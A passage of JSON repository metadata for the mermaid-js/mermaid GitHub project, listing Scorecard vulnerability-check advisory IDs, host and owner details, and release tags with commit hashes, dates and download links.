vulnerable to: GHSA-9gqv-wp59-fq42","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-rhx6-c78j-4q9w","Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6","Warn: Project is vulnerable to: GHSA-c76h-2ccp-4975","Warn: Project is vulnerable to: GHSA-cxrh-j4jr-qwg3","Warn: Project is vulnerable to: GHSA-x574-m823-4x7w","Warn: Project is vulnerable to: GHSA-4r4m-qw57-chr8","Warn: Project is vulnerable to: GHSA-xcj6-pq6g-qj4x","Warn: Project is vulnerable to: GHSA-356w-63v5-8wf4","Warn: Project is vulnerable to: GHSA-859w-5945-r5v3","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T09:31:17.427Z","repository_id":37269779,"created_at":"2025-08-18T09:31:17.427Z","updated_at":"2025-08-18T09:31:17.427Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":273137429,"owners_count":25052011,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-01T02:00:09.058Z","response_time":120,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"mermaid-js","name":"mermaid-js","uuid":"57169982","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":"mermaidjs_","company":null,"icon_url":"https://avatars.githubusercontent.com/u/57169982?v=4","repositories_count":11,"last_synced_at":"2023-04-08T11:47:59.066Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/mermaid-js","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-14T05:34:15.747Z","updated_at":"2023-04-08T11:47:59.094Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js/repositories"},"tags":[{"name":"mermaid@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1/manifests"},{"name":"@mermaid-js/tiny@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1/manifests"},{"name":"v10.9.4","sha":"80dcf2eaad5b484ea41b5e0a8aee3fa8c5b99d34","kind":"commit","published_at":"2025-08-19T08:40:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4/manifests"},{"name":"mermaid@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.9","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9/manifests"},{"name":"@mermaid-js/tiny@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.2","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2/manifests"},{"name":"mermaid@11.9.0","sha":"767754f4fbfe22e74e0612c5d684e9b58c3c5caf","kind":"commit","published_at":"2025-07-16T08:25:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0/manifests"},{"name":"@mermaid-js/tiny@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1/manifests"},{"name":"@mermaid-js/parser@0.6.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1/manifests"},{"name":"mermaid@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1/manifests"},{"name":"@mermaid-js/tiny@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0/manifests"},{"name":"mermaid@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0/manifests"},{"name":"@mermaid-js/parser@0.6.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0/manifests"},{"name":"@mermaid-js/parser@0.5.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.8","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8/manifests"},{"name":"mermaid@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0/manifests"},{"name":"@mermaid-js/tiny@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.1","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1/manifests"},{"name":"@mermaid-js/parser@0.4.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0/manifests"},{"name":"mermaid@11.6.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0/manifests"},{"name":"mermaid@11.5.0","sha":"41a737f6821df4cdeab75643984912b82c1dff7a","kind":"tag","published_at":"2025-03-13T10:34:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.7","sha":"becadf0a7de509b6cc81e99a04abfa6cba8e7bfd","kind":"tag","published_at":"2024-11-27T17:15:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7/manifests"},{"name":"@mermaid-js/layout-elk@0.1.6","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6/manifests"},{"name":"mermaid@11.4.1","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1/manifests"},{"name":"mermaid@11.4.0","sha":"56f522ec50b5c746be5532686dd465a06215273d","kind":"tag","published_at":"2024-10-30T15:43:30.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0/manifests"},{"name":"v10.9.3","sha":"85ec96a72d06d45cf5d2b88af6ef0aca2d16c187","kind":"commit","published_at":"2024-10-22T08:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3/manifests"},{"name":"@mermaid-js/layout-elk@0.1.5","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5/manifests"},{"name":"mermaid@11.3.0","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0/manifests"},{"name":"v10.9.2","sha":"4dd4997c4d73784a239bac04deded9ff6866d2b4","kind":"commit","published_at":"2024-10-02T09:31:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2/manifests"},{"name":"mermaid@11.2.1","sha":"d63dc319c7c57a9900932fe4920be6a4e54570d5","kind":"tag","published_at":"2024-09-16T16:41:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1/manifests"},{"name":"@mermaid-js/layout-elk@0.1.4","sha":"9c41708d9e439f4cf82c0c954e6c40217f6754e4","kind":"tag","published_at":"2024-09-09T14:03:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4/manifests"},{"name":"mermaid@11.2.0","sha":"80903ec281db9053486f7dbfeae8430d2618e54d","kind":"tag","published_at":"2024-09-09T13:23:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0/manifests"},{"name":"mermaid@11.1.1","sha":"73147196b11e38bf825df17ca5f319aa54748b90","kind":"tag","published_at":"2024-09-06T17:19:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1/manifests"},{"name":"mermaid@11.1.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.3","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.